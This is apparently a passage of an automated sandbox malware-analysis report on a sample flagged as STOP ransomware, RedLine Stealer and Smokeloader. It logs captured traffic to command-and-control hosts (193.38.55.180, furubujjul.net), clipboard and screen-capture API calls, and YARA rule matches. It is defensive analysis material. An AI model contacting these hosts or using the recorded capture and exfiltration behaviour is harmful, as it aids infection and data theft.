8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 02 fc 6a 82 d3 53 f6 bf 23 f3 79 5c 03 d2 ff f9 df fb eb b2 8b 6f cd 51 3f 33 d1 f2 61 45 7c 0f 57 44 2d fc be 3c 50 25 51 fe 08 a2 b5 7f 18 66 7d 28 2a 97 6a dd d6 bc db 43 15 5c 53 a6 cc f6 4d 55 60 91 54 5b fd 55 19 d0 ed 35 67 b1 17 26 58 4a 9b 6c 4a 3e 16 21 0b 5a a3 06 b3 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 78 5d 47 db 9c 01 13 13 bf 1e e1 92 24 08 4f c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 93 ce ce 4a 82 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 22 be 21 6c c9 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 1f 5f 26 b9 72 fe cc 23 b2 13 02 31 79 96 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 03 11 eb b6 81 55 5d 53 b5 69 b7 9f 0f de cd 46 d9 c8 19 ac af f3 d8 55 3d c5 b6 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 cc c4 06 f6 26 21 03 fa c7 9b 64 d2 3c 66 f1 2a 69 b1 1d 06 13 51 8c f2 1a 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 34 15 8a ba b7 1b 6f c3 cb 29 22 fb e4 5b 1e b4 a5 1e 26 a9 12 ee c3 76 59 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 6c 5e 9e 43 75 87 6c 97 a6 7d 10 9f 10 b6 d9 b0 99 c7 8b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 ab a9 d4 7b 2f 13 73 49 a6 cf 46 1f 88 ad aa 7a 8f 26 79 e3 cd de d9 37 00 0c f1 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc d5 be 63 e5 22 80 03 eb ac 98 42 6e 0f ca 82 2f 37 2e 9f 94 ce ec 35 02 d1 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 2d 38 6e de c2 fb c1 c4 a1 33 Data Ascii: 7a2c`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*jjS#y\oQ?3aE|WD-<P%Qf}(*jC\SMU`T[U5g&XJlJ>!Z:V/#RSSR+{~Ex]G$Oa~i~_DzN,%Qa>|(HJ{/a]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F%2FvJ%2B2Y79g%2Bkg6zS6Mq1gveBdXksI9rs7yAelvoIBOh6riY30Gpod8CWslC%2B6nO8Vj3yY1VHW2kQ0uw6w7QGS9YnSN55wqOhVHiyM84RUcZ8wVcoSoFc5JIjPlJIIJKxgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546bea79f830676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zzdIwF8WnEIPoM2QorKNSkALOAC4cWQ2JzsYf9T40YQYOx%2BC1BIku9NVLSXff%2F9%2BwUMFs2YpfyIFsDXOnLYh22ad8LLvoGI5jPQcABeKkG5cASukLG8vnnnYZyFB%2F9pjGQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546bea8a98c0676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.55.180
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cubye.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: furubujjul.net
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49704 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 11.3.sfrvjvv.5c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.sfrvjvv.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.sfrvjvv.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.5f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.472600397.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327538196.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.307013938.00000000023E1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.244640816.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.473353545.0000000000871000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328002456.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.459694158.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004188D4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 13_2_004188D4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00418F18 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 13_2_00418F18
Source: 253.exe, 0000000E.00000002.447782321.0000000000949000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: Yara match File source: 18.2.253.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.253.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.253.exe.23d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.253.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.253.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.430997531.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.425225650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.428495458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 253.exe PID: 1692, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 253.exe PID: 4188, type: MEMORYSTR

System Summary

barindex
Source: 18.0.253.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.253.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.253.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.253.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.253.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.253.exe.23d15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.253.exe.23d15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.253.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.253.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.0.253.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.0.253.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.327806138.0000000000719000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.472600397.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.327538196.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.473007456.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000000.381594239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.448264858.00000000022E3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000000.430997531.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000012.00000000.430997531.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.472415838.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.307013938.00000000023E1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.327509086.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000011.00000000.373415476.0000000002C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.473353545.0000000000871000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.328002456.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000000.425225650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000012.00000000.425225650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000012.00000000.428495458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000012.00000000.428495458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 253.exe PID: 1692, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 253.exe PID: 4188, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004022E9 0_2_004022E9
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_004022E9 11_2_004022E9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004270FC 13_2_004270FC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0041C2C4 13_2_0041C2C4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0041C7EC 13_2_0041C7EC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004277B8 13_2_004277B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040CB38 13_2_0040CB38
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00428DA0 13_2_00428DA0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_052A4450 13_2_052A4450
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA2440 13_2_04EA2440
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA4570 13_2_04EA4570
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA1000 13_2_04EA1000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA21A5 13_2_04EA21A5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA13E0 13_2_04EA13E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA1680 13_2_04EA1680
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA41C0 13_2_04EA41C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA2EF0 13_2_04EA2EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA3FE0 13_2_04EA3FE0
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: sqlite3.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: 959.exe.1.dr Static PE information: Number of sections : 16 > 10
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\LocalLow\freebl3.dll B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 18.0.253.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
